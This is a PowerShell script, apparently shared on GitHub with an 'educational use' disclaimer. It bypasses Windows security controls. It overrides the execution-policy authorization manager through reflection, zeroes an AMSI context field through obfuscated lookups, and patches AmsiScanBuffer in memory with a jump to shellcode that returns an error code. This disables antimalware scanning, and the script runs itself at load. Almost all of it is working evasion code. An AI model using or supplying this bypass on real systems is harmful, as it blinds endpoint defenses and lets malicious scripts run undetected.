# --- Author: zetod1ce (github.com/ztd38f) --- #
# --- DISCLAIMER: Provided as-is, without warranties. For educational and testing use only in controlled environments. Use at your own risk. --- #


function PS.SecurityBypass {
iex '((($x=$executionContext.GetType().GetField("_context",36).GetValue($executionContext)).GetType().GetFields(36)|?{$_.Name -like "*auth*"}).SetValue($x,(New-Object Management.Automation.AuthorizationManager Microsoft.PowerShell)))'
iex '([Runtime.InteropServices.Marshal]::Copy([byte[]](@(0)*9),0,[IntPtr]((([Ref].Assembly.GetTypes()|?{$_.Name -like "*iu*"}).GetFields(40)|?{$_.Name -like "*ic*"})|%{$_.GetValue($null)}),9))'

Add-Type @"
using System;
using System.Runtime.InteropServices;

public class SB {
    [DllImport("kernel32.dll")]
    private static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")]
    private static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi)]
    private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);
    [DllImport("kernel32.dll")]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);
    [DllImport("kernel32.dll")]
    private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);
    public static void X() {
        try {
            IntPtr hAmsi = GetModuleHandle("amsi.dll");
            IntPtr scanFunc = GetProcAddress(hAmsi, "AmsiScanBuffer");
            if (scanFunc != IntPtr.Zero) {
                IntPtr execMem = VirtualAlloc(IntPtr.Zero, 1024, 0x1000, 0x40);
                byte[] shellcode = {0x48, 0xB8, 0x57, 0x00, 0x07, 0x80, 0x00, 0x00, 0x00, 0x00, 0xC3};
                Marshal.Copy(shellcode, 0, execMem, shellcode.Length);
                uint oldProtect;
                VirtualProtect(scanFunc, (uint)shellcode.Length, 0x40, out oldProtect);
                byte[] jmpCode = {0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xE0};
                BitConverter.GetBytes(execMem.ToInt64()).CopyTo(jmpCode, 2);
                Marshal.Copy(jmpCode, 0, scanFunc, jmpCode.Length);
                VirtualProtect(scanFunc, (uint)shellcode.Length, oldProtect, out oldProtect);
            }
        } catch (Exception) {}
    }
}
"@; [SB]::X()

}; PS.SecurityBypass